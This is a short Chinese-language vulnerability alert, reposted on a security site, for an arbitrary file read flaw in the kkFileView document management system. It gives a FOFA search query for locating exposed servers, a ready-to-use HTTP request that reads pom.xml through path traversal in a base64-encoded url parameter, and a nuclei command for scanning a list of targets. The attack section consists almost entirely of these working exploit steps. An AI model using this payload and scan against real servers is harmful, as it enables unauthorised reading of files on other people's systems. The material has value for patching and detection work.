漏洞预警 kkFileView 文档管理系统任意文件读取漏洞

2024年3月26日23:10:22评论53 views字数 381阅读1分16秒阅读模式

0x02 漏洞描述

kkFileView 文档管理系统存在任意文件读取漏洞。

0x03 漏洞复现

fofa-qeury: body="/onlinePreview?url"

1.执行poc进行文件读取pom.xml，base64解码得到结果

GET /onlinePreview?url={{base64("http://{{Hostname}}/?fullfilename=../../../../pom.xml")}} HTTP/1.1Host: User-Agent: Mozilla/5.0

漏洞预警 kkFileView 文档管理系统任意文件读取漏洞

2.nuclei验证脚本已发布于知识星球

nuclei.exe -t kkfileview-wendang-onlinepreview-fileread.yaml -l subs.txt -stats

漏洞预警 kkFileView 文档管理系统任意文件读取漏洞

原文始发于微信公众号（融云攻防实验室）：漏洞预警 kkFileView 文档管理系统任意文件读取漏洞

本文由 admin 发表于 2024年3月26日23:10:22
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
漏洞预警 kkFileView 文档管理系统任意文件读取漏洞https://cn-sec.com/archives/2604466.html

CVE-2024-2389 命令执行漏洞(附EXP)